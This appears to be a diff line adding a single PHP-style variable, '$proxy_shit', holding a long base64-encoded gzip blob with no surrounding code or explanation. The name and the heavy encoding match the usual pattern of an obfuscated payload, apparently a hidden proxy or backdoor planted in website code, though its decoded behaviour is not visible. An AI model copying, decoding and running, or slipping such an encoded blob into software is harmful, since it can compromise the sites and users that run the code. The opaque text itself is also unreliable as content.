+$proxy_shit="H4sIALMXx0QAA+RafXhU1Zm/M5mBAUJmUD4i2hKsKFSBhC9RRFN1FK1bRpSK1jXEfHCD+Spzp0AfkLjDrIzD2NiK0qe1Gx+0i61d6YqCrdEgSIJGn6DzdNPKyoAB7zCjRhglQGD2/b3n3Lk3Icg/6x/77MCZc37nvOf9Ou8577k3M8VfoZXWTlW+zU8hfa6eOZProhnT+9TyoxQVzphVNKto+qzCIqWwqGgWdRXM/Fa1kp+AXytdVlCg1NY9WFe+8tx05xv/P/qZItZf1bT68m9LBhZ41owZA69/UVHhtOmzsus/8+pCWv9ps2bOUgoKvy2FrJ//5+u/xnvHLTabLYvtSo4CNPFxh2sG1Y3LRf8MpUAZpExULlXGUQ1MpYFoqLRQG8VJxUElh0oahcZQLqT2hXLMJgt/aAxl6QJFQcF8xSPGGwg3HHS4UF4coiiLiMEgOW6nqvw+KkccLpQOwiiDpAwUFzFxPeJwoRQQLrCMTa2uenBqdfnk6qrawIop/rop00S/R+p2648WSl+YnwlU5lCZROVqiSdKmdbPNVTGUJklfQSbLqZCIpTLqVxAJZ9KERWcb5dRuZbKlVQulTxGUbmKyjCJv0/lEipTqGBPDJG6wqaRyvk/jnP0D+6HXYqw+cJ+/fDJ0H59o2X9XSq5iljzEbLPLevxVMZZ5nzH0v6epX0RFWSgK6hMpjJc9o+lkkdlusSzB7Chh0rnYw7XKLvw7SIqOmH4CthOyvcQvkfiP8HOiMN1ncQFNJ5P+PcSDyE8kfBsiScQnk34BonnE55HeJbEL0NmROwV4BQVNWLK30hlBWFd4k4q6yzz94OGsEfiGuK/mXC+xP9GZTvhayQ+RKXNgteCJ+EWm8CvUq1b5JfARxb9/LB/vWn//bB/vcnvNirFKYfLwes5WllI4zdb8A+onrje9Ece/EO4WOJKKvMIe6U+Y6leRDhPjrfDP4RjEr9E4ysIXyxxBP4hbJfr+QyNbyTcKcdbqGwmXCjxVvjHon8r/GPBq+EfwkGJm+Efwksk/2r4h/AtcvxHODeiDldU6t8G/0RNftciPgg/JfFVsJ9wm6R/GPFB+KAcD8N+wtdLjDhTCX8h5X+J+Iia67OT6NcR/qvES2B/1PTfhYgPwndL7IP9Fv2CNN5GeKbEjxPe1WqsX54Cvp00fq0cvwX+sMh/Av6w8DP2Ij4FVD5E/Dxuxs/4fuPgm/+4uT4KnbW1/mqcskVKye0/K1lQsaTKr1Usu6m61O+v8CslJUtq6mpLkIW1khKQl4F4luLXlpXVr1SWl1Zp9VXlBMvrAppSVldbW1GmKUsquLfSX1ZaW6lUEvQrNRU1mEE3miqtqqZiGYgCRFRTWl1dV6b4qysq6hV/XdlDFZpSWVkd8KtKaVlZRT1xFRTLl1VpFUpl/bKqWq1Seaiqupq1KNWUB6tqocIy+q8sqygtVwK1lD0eUlStrraalCaLapXKumUPKX6hkb9qSWmZVlVXi1nlgXqF+JdWQy2oSSoqtVqd6lfq66SQmnqoq9b5tQdX1pYSmUTc9kuVKsuq6/wV8EXFMjYP1tSRAdADvqTu2roSyGLZFSuqyNS6elKuVKurUkpum0+eLq+qLQn4K8qJHu6Wvq8prWJlq4mY9PPDu2W1WrVSuayiwpDF2tx6x2033lQyjRbUaGG17f9r/3LO2W+TLSVb0APpHhmDI6qqhiMbxWyiz8PYrnwsLx0T6SwbdI0445yjxdnmpIR9d9LhGoy9ipoY34+aktpi1LR5ylFTMldRU9KvRk0JtB41JU4NNSXmFagpWa5CTQm8ATUlyLWoSZN1qGkzr0dNibIRNSn6JGpKoBtR08b5LWpKxE2oKck/h5ouBptRU3J4ETUlzi2oKVFuRU2H6HbUdFl4HTUl3BbUlKR3oaZk3IaaNmo7atq8Hajp4hFDTUm5EzVdSvahpktOHDVdXLpQU4LWUdPFJ4WaLkPdqOmCkkZNl5ge1HR56UWNZE7+HUzJyIGakrwLNS1YLmq6BHlQ0+VoJGo6hPJR0+F1CWpKkgWoKRlfhpoOl4XhQ8GUS3+ClkZP4WsTnUR7diqZmXeQxMwEH31jnTMTsKIqmol4hj4TsLIqxhIdjLHCKkIk0cIYK60i7Sa2MMaKqzjSEk2MsfIqrnyJRsaIABWhl2hgjEhQcW1I1DNGRKhIi4nFjBEZ6jxgH2NEiIrjO1HMGJGi4vqSKGSMiFEXAxcwRuSoMCjhYYwIUuuBFcaIJHUFcPcZYESU2sD2M0ZkqevYfsaIMLWR7WeMSFM3sv2MEXFqE9vPGJGnbmb7GSMC1S1sP2NEorqd7WeMiFRb2H7GiEy1je1njAhVO9h+xohUtZPtZ4yIVeNsP2NErqqz/YwRwWo3288Ykaz2sP2ngWO8/jbYz7iT1x+4g/E+Xn/gFsZxXn/gLYy7eP2BmxjrvP7AjYxTvP7ADYy7ef2B6xmnef2BFzPu4fUH9jHu5fUHLmaMnaIuAi5kjB2jLgYuYIydo6rAHsbYQWo9sMIYO0ldAdzdC4wdpTaw/Yyxs9R1bD9j7DC1ke1njJ2mbmT7GWPHqU1sP+Gizx4IHwh2dfvuXqCub8XK06X6zh+rnZTr9fm0AOnGRtqbd/mwQspPHtl59H66zAWxfqEWzZ7piPxz756dTEP7t2HuPOKuBCY9u46e7yKe0AfamPDXwRbHJuDMB9nuQHK3E6S2PTvDX4u5z95MjiOeFyHWwNwTTOWq6NSn/vTU8eAuj5Rz1yMpZAFSmikn7Wr14qlUaQ3dgYChT2sIoYjMEOHWHK9rlTOxwG7g6MgQJkS8uSRXjZPZmRke3UbuICkk+YqByD6RZP84JckC40hBGswU6uMoI1Bfa+g6KTfRM2RgYUcklydPfaOwzyRZTVbYSP2xYbAxK+Gpc0g4LqdO+2YJJyXZsKyEQuqOMmXmLMZEqSqHaCleP83kiR5lYOk5bYLt1pPfKH2QJIsaZIFcWkW263fn4HyBnHKfZQqvOGYlHxpoSr6cckX/KbhhJGcHU46B7ByPWTNxgdDzxEThdTufWZRpDCclfgdnNIOhsvL74IZgUIvN+e+fsMxn6+J0t9A7h3CAT4CODSZ104n+0v6TqIUAuzv0BoKetsRzNEOPCc0IZ2bizqMHT8gOl9rchhP6E+p8QyxuODTvDDTFtxK4AUzeBJNfZJmoceA1Jlb2EK47y/zxUCjliIbuph6fOo6oMq+ArSE/1LJmapb/VJPfpeA37ix+ewexTZLHfEnfDO6KhdHhE1lG14HR387y1Dpm5FrqjrBqxzt9+l5j1VeajJ4xGd0ORtGzGN0gNZoZ66LxuVmvLh1icl5u2nUfuNxqUinqA+i59GLLgcCXlU+dYvV+iuHRJ/qt3tvHB1g95eTZq6f9MLg6rQS8YNUEVu/2GDNF9O1F56s9Wf7Cs1/19LfzHtbHoa4nsJRCehEWVK8x/AH46K/p+TrlyI4udeurv5aMLb0j9CUD9Obpd4reylbnYjLRrri3OZsOgmOuz9CnctODKfRQQuSslibdl+ez68LsbRkKGs4m4f8d8UHOgsMOl0/9Apa2C8eJsTCbl1jlEK7mtfmj6dmThKMhnQ1N95hLZvTVXMSSQZr3jkm6J0safQY9op+M9el5zNwVdeT72AJ9+FjJwkHWStt8eit7Ite9rcWnXgLOFj7En0cdYKJPHkCtvwmHBOfuo4hU3GvxigI6Flh0nGDMczwLKve2YpePW5Fixw4939L2TEA8Wjpclg73q8UOn3r9WSpeblHxMba5oI+K04WK+udpLMJsXjh8Z7QLREPR7Mnx+vyvMpnkZViaxSRC9xhhk7vUpv8KgFqKHuaWS42+Y2yE418PcIyNFNutCZxeHsPyk9PJAcREP3yMHd7ngLox3W9PHPiKOxqfVSic5jg7yf5VbqHMLWIo2dXq7fYo4sjzdvvUpjQOaw7TuwS7TS1f0SLPxXcm8F19MnpnO7Q/CuX2QLnRUrmng3PjJMPmfrLF/WpLOHTzGeOmopg3FWcX1HAmHhNSlzrU59JY5mL283e/ktEO2sjIUEPKGCvyRDagczuebMI7rszd0NDtcG3HbejDOG+5fzkmnPiWmDCejtliduSoYDNUUax6JYdnk1xZBj5nisCVWBc4QY3DsutGy2inYwwe0N8/Km4HL7B/jyIYZvCSzeBgUEVD0ZwJJNxWp4M8b1PkgctuXX80u11ZzjHIiY0S4XUl5U15LmRF/uSouawY0W9Pi/Dh6QXvEsmGUf3UvEKqaYdWTiy/NQYok9Mio0NdjOlVx87ekzf2Zxn7UrB8ia4EET6G+GJM19VHUnj4iHhd4VCafYFvtzZJNtZcIBp57rWP4lz+AO7gnhHavYldQHPhJiXwA2wc3g///qWx26WeTe8iDnpYtSN91BV9vxppqEv7axIRNCK2bEuVpRn95JdG4rYnF2WGg1/ygJSpzUWKaIKIjywiHj3WZ5GM7smmFLu+86ixn1+jFnuC6GHCUTh1pFgC/RVxmGUCLjWN/l7DtFx1RDvhlIkLgPeZeDFwu4mbgF83cRz4Rcv89wj/1sQ/BF5v4Qe8ysIPuNrErPf9AlvtiYPuZkv/PT9+JIV7YtPCDodrXagNB2nzHvrufQ1/NtmiHPuDMXSah05jKCOHWkNbT4sjQRJt7gXRC71WIjm08RSGfn1qoKGTPHTSOhSNLqI88Zec9+lkKLbzAeNbcKfe1i2TvotGkaJbQ7nUauGWB61P0BqJVhda+dTaxa1LqNXGrQJqtXPrMmp1cGsitWLcuopandwq7BHGtYZmZFuzZSvKtlIW70HqeY7bxdyGoXQyifZJtOf14PS8g77LcQg265SW3riJTO99De+njz2XvUvxc8tWYWPYm+b7k7s11EUT8PY88TZ9Yz9kAml+r2DscdsXxlODMzHCAT13nTb0BEUO44bZivadvh3fC9iTQ6MMMkryA+vgbkzGqvuiHBc+NdBhZvE3hcSG5jY+JYdRAxKJ3UjZFxhr9lltsNG3QZJnkDgTl2fgsLYz4kRcQ6J8+tjPDLOmCFU41/JQJiWH3KEUkpMT+Ypvi/99xsrol0y916Q+rBh2YXgTDx/8TCbt7fyUhG9Fm48bClLcjrjdiQwlUnSEiYp9evPnPIlJgteFQFHwsNXQ/Bykyu3ClUlB2OoQhCKRSP/q0z6X8vmRtfl1domV1Xt2mWIjTBIp9mQKTd1SsOE/hA0ZzsqJztNWJzzPVrYns06I9nHCyzz8J2MYkrGv+SHwF4KRpPwLUwb7U7LfK/pQ7mDKe/tT4m+0iTmnsR+yxnXbELAtUqIZusFmtEY87ExcilDfgAMhwqM74s6owxPdIO3zLdC7j2Rt00XUHzfi2P0GJeI4boLN+K7VbpGNNXmiUUrJ6wWWB+SnjP8bcdLL5REyM1v5zNErhZ+TPzdspfvKL1PyviJII2uZNOxJLrQs8j+lzrPIunL2IveV/U5Snn4t2d0tdi6/Tw02c7d77Uen+vi3kW3jk1qra2jG+aRo17B9OJ984sjyLbW5t/FB5hNnm4/gVtb8v/KQLAs24dqdnMzZGv/ORb7ZQo5bRyCtjzcUh1LiColWtKLngRK8KpPvymbY5P0K57T+h+FGjo6GOvnQ+cImn7dw59jNqdzJtylgfZ+gXxc6waMnccLsDp3C64yG5hN8TKnsX3kJkNeh14YZz0ER5ms+tcU7zAvDDckB7xGHxGQxMxyK4ZnueptcR6F2sMXhE+Ro6YOOZB9A7QaBPUtAe+ZQIkswtK+m7mEW88XFS9FG9JH9FvlWfz5XPHUpe01FXzLE0uNSD5+QPcaTYVo3nwx3Qc4xwyN9bT0xVFxtTw7C1TYtpn+Tz4YdGdBnfx5qXki34CJ906cyOmLZB4xYn1vpbOlRu8w+0h94rcj+6GJ/dBn+6DL9MZWTDSY5NbcQwEfQGH7udrhfDSXOcAjrciEk6znnZx0jRvJ1rmRzjTe9yp4cEw0dgRhvmvIt5b7BUW+acutHFiKpCX64k4gSm90s3rmbCQaydNRA6kgu+HlP4tacbMxZ52mu85oxPCerPx2TTIZvm5YvGnZDDn6qk9gvE5GHnhg5Vj791HhzAmgHqySzEidSB7PKE40cbXlig7E51DY8hwo13xt8XjUrWTA99TvfpRk+qt+R9R5Zg59PvWwvnsQRVVHWrCAxTUq09XXNveeXedRmBIluBkmxwSD//Az+bGPfYtrutRPl4hqbQTDTNw22vjIJPMDHnRwbe1imDD4mmjtZRF5EwBW5DnGzgij8Hitxoy2bQEDBCYTdrD9xSCStSXzqC+7CS08LEQYf/uPkSZmI7Opuc40mDTqvuW/1maduBf8xQrJ7mxOQs2V5l3yhhp4Ix1w41M5c2zlchokGRV7yKj2AlwQsJTmOjaPIY5tqBGf9ZzaDwNAqz6pVcmpraB/VxrsRBj56iJOHz1NdAx4+8qkpX66LthLpkW0QjsvMRL/+G7kxvT3B1T2K+ZeBffyOvidS7Ni0RdhNKFN/if50l/GQxh0j9X/NdmQCPfoKqY04VxIbpEcH0QOwXX9XDAqOc/GtrBwiJSZreFvyppSW3d8l70Qrb9eLD1I8KGFvr3nqvndAvKDx9oa93cHV3RXaCPqu0+zJC4gnfmyXvIga+AVg0mNIGSw1i3jT0kOzEdGQqjLX8hzpEH540YYRYdgbS+ygObu9nc7d3r9T/Q8qH9kQ6d5OTop/t/OsJsTNOm+8qZXrAyIHejuNLZfnMDMHHtv0R53i3XXfV18WHyw6YH2WWjlUv/qAeOv1ob7GKS8bTPhmXCwDqFxC6aSbanZ2qzcmjI4ZRpNEfh70pkSl4+2VeMUCvWymWHFYwgj9rwfFEwNsCXs7nwXrsDce8abmeLtXXxXx6pWtN79NoRNcrSsBWtkOl/R5hxDfQeMT9zmUZG5lq3efTaHvLhs/EEZG4YE23EHPA7YO+TciS2NHPMdHOQVK/H6/VC0WXB2DRybEhUdeA14xtjLi/TgYd1XSnT2P2odl256k2I7xbxUuwjFDtIj2GH5omcCvVsQ8j2Wex5zHwXyAbWBbl0DlhamIt3tSh4/6KFn6DKPbDaPbhdHtGW1ip77/435q1+4Xar/CeIhULrkmsjAW9aZsnsTzeCzss0zubaRity0Yt4W9Or+RwmLR/ZQ8n9He7tR/fqCfkCFSyAd9hYxl84dIw5IU5DHaQ4npZ0QM0IV3S1xurpjlxRp2SoZv7eIidGXc2PpGz6S4PPDl7WqpvF/xUU5nlt62v987HeNseEkKXOgK2yNeV3A2q9uL38UmqzkIMwE6clyZQv3u/f9D3rNAN1WmeXPvTXLbhiZIq6BVLy+nPFqwgGJZta8rVGgb+1DBQSY0SRNsE06T8pixIKawlAq6jjPjuIrOOoI7u+Nh3FVnR8XKIhSsvFXKez063k4Yt+uiU2dZ2O/7H8lNmxTEs+fs4z/8N//re/zf43/d2x8+LowiwxCWdZ5k4855/NouWkjOFfHchFaPPjUYZGMMJJMp7DxV2Hk+du7W+gXqlh11/R2ag+i6X9JsOPzqw1hfYUxqPY/CfvYkFfZ+zK/GgQ23L9FrAOPGun4TdKt/luZ4eNugIegShH55YgChaYMImS+H0H2Rs2UvFB3EkalrY+ue8/80gp1VoV5rybrjE/D9r7il7oy07sSTjefpZn+JoN99klX1kbGvz6nnnoiPTzYhfBPOz1oXsG3Tm4TYKvxeXMhDsb7yJF9RQ8ewBHiDTSI8lsrkiUNXR1FWRHc7ScpRRJostfl+cBBNfaf+++OIYiqx0536eoqwo/V83KRQ5/bXi6xO+mthv2b2Kzt9f0lw2fSJpKtqh2aLTZd8uNOdejfDrSmkwzItBjGMOGE04gSYp3kH460/O25sLUdalYzlswApDHUdjzyFnJxhphedBAlcpkbHQEJhM9h5ic1g583cTk3cTsm+M3I2C9B11Dk6KrK87dqfve11/d72iq9xo5u1xKTvPBHTWmuf0HL1bvORr+i7ABj3ycg2i45/X8PIAmOeva0TVdc6UghbIq05Qss4Iuw+/a8pIgovGuD/A/lZ2EeajdQ/7aH0SsHR+mCZF0ewwIjAyMDvDAhy9Bc5AgdB4BBaCojX9oEd6FefiK83+nQlBcboQ6SBTf/Zcdb5s5HWs0LLCNrSamhZTMcp7Sw9sACKOKPfeJyNR30gGBCpCCnwK297iULLvoZkOrSGoRiGX77XQwNsVXDbVIKjGHQeViV0xAHeFxznFoW9itc49KLj8V4pekGCyYyEEQH0euFiSxbMABfQubDRfULC0i2NzRXR259Axafjauy0aFzMrLyGLdL8V/FVBwGwYeWqvdA7MBHoESELVjWd0v0aO4SWYIvZDtU9mdR7Q/ipj5bVrnVHWrvF8NX4XA1C6DaFG6JV8CuFJ0ZnQze9kZmmcC1NiOG5gzFNIJhou8mDq9NFfI01sPQcnZeWqGDox3u4oRNlKUxp4BQltrjSRnJDs+mFHzNDyyGGZjD1bT2D7IrSazPFNpBkObK1h+0ftaMicg8r5nbtBI40bxTR7UILa9GuHSOU+Yz3NrdymRCXhZW3civP0af2GK18DM0RfjuEF5GnWP/pvOHDvzxBKwZoWa8+yqe7ORylrD/3UXzlTmh0HzXS2E5z+kcfDaLxBFvFO7DHDNs7R41LjXCVvhnRzwyFtTjFSQMpLkigOI9RdA+iGB1NFAcaK8qMdImgtEzI7S5S6MAHPncAFpPc59hHalz4faCLr6klITgZ0sKjvGQHQMZJKK/OjHxywdvuzIzeFGsnYrtrvGTaNrb7T2xH3lnYYA+Ok97YD9kqp4hs2si3l+Fr2Tte2H9M301e7BLZfQmLC/3RD2M9BMzQDxzSaSMMvR9kMvYV40tcn71tBK7xaWZ1LU247W0/NfFS9+obacJkbyO7V5IR7W1VgLH33kxe4rW3iVI887gNVia9MvjRGlKyBxeXbU+kGfOrp9DWS+xtjVYOusT+WLOZt+oiUHYwvN6zw3gh/jGHvQ0/247nV2fT9F4CsAC2Zr1vxgDyCMAhWOj1bhmGfvapTNcbG7VPnWQKlZeYyCgp6786QuZr2HNEWs8IKxSy5Baj4+NC1a85EjemuIAbh1ELJi5CUE35kLuIEbrncDLofIDuqEDVdcAa3DFwlwK59mKl94IND8KO0oOwY6h/AgDGlc6M8Npda3tQPbvWHscfumUna8ThtMYUP+FDg3sNM+zsmLH99CHC9izSrtXI+g1JWQ/ZiGVBIw+6Tp3Czb3LhF7VW26LnUwaydzMLfwIsUZ8mlaP1393aGg7NtvwtJKIIDyWjp2SwBkY0LYng5wt9Vzg3xJF3iYfcOHpCflyKpwZHUkh8Yvt6BSaxj+OijLccircrRmC0YX3iujCvQszuIJMRDM4DMGk/BoV6XrCCl09dghQET/c1guO0EOg15/DNnFgh76CAbdNOpYA7dj4E4RmHdwoOyKdklP/w2GG5yc98Ur76225x2KNmMiTa/+ZA0btT9QnHozrg6gWRpBIlwRrFIMwlqZzKTUkNYG70pOaQP7hJCZQSBPCykz9lQMx2tF0qg9zKn38MQ3tooeod+wl2r6bxit8A9gl80Dvz9JibgY1G4psVHHM5ahrSbjCQgXl6B8fYNo9EdMPFHPdmp36vYf4mgxm7JFkxv7ng7TrO0BDCOZtfyr3JFUYwdJpHVJL5/Yl+Kjetn9or9mv8B77kyroJYVN8eSFuZHShoND6yh9/yAdWVLJvVyJ62gmTSjLrGxcYqYa6XSn7oaiEIc+fiHxuzRyeo4JKbyi9zRZ56Nuljj0Z/exBVAWWRBn4V5zu8COydeexn7C7yn2e5L9kuNP35mDdGu/NEv3HKCbuIWgQPoCAHX4zj626ip1RBsJSYUBFzlhqbht/0DaYlSjZ+WEQNxAGBU7BUAqtIn9jTZiFITaPXFqZAW7wiaGR1EpiTEpkYPVTyxJVExbLsH631pSKfu5/UMr+/oPLl/Z37d8R2VfZ+GYB/RPtJAvPOi+JkcfuS9h+5WuL+/GZaIYPkHy4/WG7qGd41Uzd3fZ6O5Gd83iwl97LHbqxHZz8TeYeuUHfGeOXy2qJGdz+s6Sd4y0leLk/MZKCIEfd1PQTmVIvz+/N9HvH3t/6K59LKc0BVyA9f5aTmUKT36QdHq+7hIEvTLX+oJwbkzLgdQAM2TiruBXx7ilN7wft3TuyIf3DnCm8C3f0od/0c0OYojvmFqS+84WKaXAcGnZ+7CUSmCu7qQC+8OeoQU2Q/qWApOlBIa/oi/9mLFSZnIScz7hEDdAp/4MEa7KrA/FPXKvgfEB60lY07NtDy44+LLFN44gnEMQlr/Pz9t8Ew10vtzDfWHjc0djdky+n95Kqmz4Mp0iIa/Y/4qUKk6Ot0uMne0VGfnfEyNXYiiOpCY3Mym5MQPIzU9OblKcnLE4a4/Rh1GKh7qM6k/uvXfsTvTefbuHto1RJj4C4g5m8Kz9r6kX8Yf3DLJGAazx+5eguFXgZi0RyF3sjdEZp+9BQ/c/o53tqDjz2xvXRu/5U++7fza3d73bf+OEHe0HIv1iWKWTQ54p+eRATq4GOV90siGtGs5h4nDp8W1vB0kNPhSr4QNE7OgrS9e64odiOYaaHH1SV/z8gAju2HvGUzJbl/GUTCFbdP6WABo3DV1d+Z6x2scPuRzktdALZO++1hT7QiLSem7UKjF6+0bt5fYdUt25Ddq5SGfxenGjtiOed60XoV3aasdG7US8dCq2wi8o3tyl/X7SLu3zKbG3Ovx4fpZme9jce1LAd4xbIG7FwiIobQVuz0maUrRBWK9t7UB0IhZn0mLIYcUWPBIBeg5aukHo7Bft2zs3lOW+jLT7LpIzk3eliliDyBkJGrTvePcTeYO2tbNfhlzaAQJgSgCA2sgZO9Sy3e4GbUtnvyVZa6QPtZEzdyaShr5HBKn36os4ftmK8PMRPDaVNMecXcLt+NdjnSIW2mhhRBdJMaZ3oXBg7fBCh/YCO+uu/sX0qKxE+i++ib9hWyQqXzzQIUFBy7n7H6DHQdX87ydfHQv74n27mCEKqQKavynhpprEkOcT8vJ8nsalQt4ySC3zNIfwYoC8esjUBwNef4OQ54W0N9hc72kMuvCWA1dzWAj5WsLu4PKAUB5Y5mr0u1VXc0NLkycQLlTHhwyXwVT4QyF/oEGllx2k13g8UK/m+VRAqCLdgRfHDAgcHlovdrlVylJLM7m+QPX6Gz356UIN8BLGRsiQ2hSsfyik5ufnq0KzoFVXV1UPRSLNWV5G8ADqlka3GgiG1cUeFa9E8LhVQchtcq2EPEXqD5H65pZAAMjdOSFdGN8ipJXGAPHmB5UjTBfSuGygCHJ4X0TuBNXrgkp3ulA1N12gaKfmT80vULHa4xZqULzYGUM/hgjpxQHVHwCdBOqBay+DavI3+MKqqxEZWon9YSyDsOpCVANeNRxUiVZVzwpPfQtRD5NXGqrQyBvROTA3j1xkQfQRUIVC6H21p9G1kii4sVENN7u8Xn+9GvY1B1safCqIJ5//w8ZJAiOIV2PEZKPmqfWuAArU7Qm76n2q2+VpQu6WD4a/r7i6srxydqGaXI/1IAFgfDT0rLk52Fyo0gs9YqSEkka878OtLl6J0GFP82iw6PpgE3aJ3SWC/pAyxJVPMRuA1FzWKw+SnpAcvsK1wt/U0sS6qKKHoRnV+zxu8CQ38ZtlHgPWUCJ8gpYS/KC+0eMKNK5UC4llYfF4dwKe0jin5NoQt5o7PjRBABOpKZ6tFaIVqA9UOWvLqyprFqrFpZgAs6UF3KfS8nyTVRLoMKLGgtsfWgq2AcYAbkOqQqANT0B1BdwqXjySTuGXxeDZ4DMAfmlzsKHZ1aTy2gRwgK8nap+s8vGKWoGqtoQ8SYYL9Xv4/F5sSEjL88box8Y4kqe+gVmUXU1V6dwariXPMuiG34tI0tRUIWaQwGwoDA5FJViTOBqlEddKBk8rjHSTjWNpfCAeDM8rhkRB7YfLltpRbsEMtTK4TC2YOnU6jHHOqura1A4gCPOqZi+6q3yelqoeBDFkfUndXXdp1Ytqyhckb1JSXDoXaKSkX6nNrqotL0bhLqotr9Cq6hLZLa2qrNSI7BeVl83TBrUpKa8sSwrIQs2cutqyqvuSI4dQUXz/ojiNmkHw0Pda6J+zal556fwk+Fm9dn+pRnxrYH2dc5Gzuur++Ytq5zuTSShWX1xWVj1UfQpFxurrarSh4Ytrau4rG1RfgfaVijiEQCgUoCEEAR6u5O3iYfy0gpB6O0xTA2RXplXOHyyuKQMkROx9Bv2ZLsyprXUy7SQjlWIQjAUN3HBxoz8E47FxaF/uD/tUcNAGTzhhlrtUz0hwCTDDsfQD46cWuKfEHgtJvjD2WAhCwMk4gUTJNlkJpohzIdaytBfiwm30vpuUonbn839CMvaZ6ICNQpg+UJhTbs6/OX1OMERWelAIzMFPSChuCfuCzf4fkrG2UC1xhWAlALOJszm4YmVe8lqOD6amS8isKJq8HzNTXV7IAhnf8huDDZfA/3810P7jVWj/X4OJ3LGJEV/X4n2UuCcqiNUOHaj8cB3x38nj/94QCNLl7RXDexqCYT9bn9El+RXD4+15bhVvAbz8gJtKukCCdWY4WB9s5Iuhy4MnW77vIAFypeB3QADypxsPmKVgm4p3An4rCcJWpwlX1LiDCbUsXRok+7zLDy63u9kTCqnhlUs9V4KkJUAYh70ooAk2wlaHzarkJsHL4T82JwMOBtvs8ZL7Cy8jcGqe8HLYrKktAbL5Qp4uj396XSTdZ16JDePFkfHd6LcP9GrJK8dgkJ/fDYrAY5lwMAj7nsBlTZleV9jVqDIpXKEZmwwRL8zD76Lx+jD82vkxdjdp7hr6Wv0H6+ibv22PygpuZnQTvQcZP/3OZvhwfJ8TpUe4L5voHch49zDeu6y0ywqm+9bLCr9rGT8VxsXFhYsXg51QfhF+kZc++J2zfuj1U7KAB8bGXwx4DzVPn4K+fQHxAsTMDlm5Ae/jhXgHxEqID0IMQFwFcRPEzRBfgbgd4j6IpyB+AfECxMzHAB5iPsQ7IFZCfBBiAOIqiJsgbob4CsTtEPdBPAXxC4gX8N7djQAPMR/voIVYCfFBiAGIqyBugrgZ4isQt0PcB/EUxC8gXsB7ZzcB/KYhZDS7tLRQzZ1dWTdBnZZfgFdp/88vEej92qLwcQa/HRvtMIvZJdrnPOiz8Y7qcaT9GBtv/ze7qb2+t4HaIQ+jBX5vOOJ+B+KAO1cxHM7gjWSyPkFiGMOQw88ofg6YTSJesauIldI3iLICcyJwJM+DBG5CzZgwCZbxwJBstfoDYUE2K7jE32KFEkmTfgo10l01DFDBC9O8oEhFvk56HijJOZtplVQMHidfTxvKggXv1QRUeLfhs8DmOHmi1IstJjFU0grAIk9m7SX8AxQ5bwHJKdIIBM6ndTbpKLIyheYcUjZimYp4xbFZEm6E5Ztp3UjJhDgLbiV1ORL+yZI8jbZUBYsbSVjTZPFBSNjkv5AeRUyFLYyfxSAveZabtFaEdD/025QhY1txDULKpdJO6IhcwmUhHsBrneUa6XUUXiXv16vIexXv1xTk3cmwSkeQv3t4vzIRXTWl7xDEzwmVBdItafA7Pybxe1F6UKTKbulJhPBwjvEaaNlbw2SGl13LDZSSTboKkfhoziFNQp78biYzNFF5CZfZWeTwIZrLEcQfiajcsFSL6JpjncJciCtXfAuyWfIa6QGEbeX8PIDyXMX5GYZ1q3lf38fcI4wfQTyM+OR1FO9a3lfbl5g1Vw6rMKNpYm5YIQjXXPENWrplMbFSOQ16g5EYryRY3kIbtoj4rloxV0n4nae5nHOOg6u5EukRzhdApc1ygzQJeLXkYA4bjQK9WK53SMx2K1ATZnEd5B2WsbTt6HXGtmNoW0WwzLYi1cxDKGHrTfYAflhv7wZyJvszACfab4MSyf4SWpf9DmTNfgfUWux+qLXaV6F/2v/RihfyZ35OkMy0d6Pr2p0KOriCAvgKKrKsJdJMqLA2/JuZcjIOcz78EAUtDf/W1erPs1DpnwRg65JbmTXgp03Wh6ZZqPQdTWjbKKDhmBpeBniGY9PhuzHVY+ap0/iI4giVIYegpYItXwJeZlrvlGqQevOdFsrLtZgLaYyXYwBibeGW8Eukvtxpobwsgt5bV9CcQ/p3bPnDdgu1TDti+dHzFmqZfmz58G8s1Ju3IZZHKE5VwjtUrWtobpz0FvBkfZTmcqVqzEVobrLUiLl1NDeVymU9lct06NbdQFHBzr4DZMZZi6SroJ/Wxz9jIv4XzD1Bc7LUg7mneLeOI3tPcwPvQHU+yweph5C9zW+wbqHJWJ+nJjNSWoe5F6kyVGDhA8B+1SF4WPD/ATApGTLykyF/Rp6HyBMHsQwZTcGB+qbKi6uMPD7jD2j5J/gZgbZgIq2gZLQFn2hh6f9gIkPbbaRkLjyvQm/KIH7laLcMto0kFjGcNCHnmBnyvQDjeD4BEEofh4IRvyE8sJKXCEWUg3IOkj9H27f+rZSFwvoVHacFCW+Xtf4dQqDIib7+/hy1apiQwFFQZVno+oKYC9nJlunSr9GjCt5mtogwlml3mymMbTZpNGMYaTQFGw37I2AHMPTVbByTlA+rIc1mwexnUVEqCj67H8eN0UGs3IP8WbNvwpIx2Dy7myj0MaxUKeRq5Hr8Ziy5Dv3Fmp2ObW7ahiWfk/Ep2wNp8eYdWPIaGbiyN6GjFxB6JTBsi9NOY+WHCGnOLkaU05GDbLw3WpyBIs5ejpW3EC6wF+JMpJCNf4ki3obks1Hd4qxchYgdC04jxO0/xmQBorxjGSa/QeA7SRLHdLFoDSb7UXTFpPRJbFBCkjgqiqU43WenIZtlBG8fgmmEKfxvHkSyVMhGsxH/i71rAa6jOs97r67ka0l+qtc2GIR4OHUH+8qyHjHgprZlWRbIkpFlQoCyvo+9dy++L9+9Vw9jWvMYsKkhZEKLp9DWoUlwKA+1QzN4YKZqQxo3pRm3pakz0I5LnY6VksGdluI0IfT//nPO7tmVeGQ6tNOZrH119tvzn9d//vPv7vnPnr+fM7sdtd7OBf8GaAc4sytQnSE4QIlhtiXMN8XYv4MTI9ANMTyvh3dxaX+F01Fu7CTy3c1Xn0DNbuLTp9DYm/l0AXK4lTNLoojb+fRRnFp8+iAabzM/TdQ3z8nwBhDex6dvoIgKt20SRdS4FTO4OsatuBO0k3wVOx+H9/NVfMgcvotPIXDhg3dSTWK/hhbfy/lejprdB2mJFUH7AFfnXVT9QW7bWdyWr3x9ProMjx2xs3ha6PoKyJbjxrjxGlyF84hI7x04xeCKbOPEcRDswoNKLISrt+DhJPYUxFKwYBUeCPJ4xohdjHtxFc8VsRO4LU0O00vSMqa6B3egu/EMEBtE2vshFTG8XEWOoOrLvwB92RdCi5bjdhxNhrh8bDVbP4yhHbsR0tuKu3HsDSqu4coETo9iIG8/0aj0RQyP0PNu+HajUhWxDmjQwdcblaaI/RmS7H6rUam+WDsu3PJeo9JwMezoOu/2hU248Av0d3G8SSkh3IqWAKobWBdT4XLsAvR4oo8v3IBke9xkOOO0FAXNGfsGaJP7mpQOjeFlct6z9/AFKJNYLx5NuqGKYpeivZ/G8OXXzIYNzNT3oI+uYZG7H7y5FhxbMQjNeNFfo+T6OnjXWMratJ+f/ZvQySHsmtJeLZ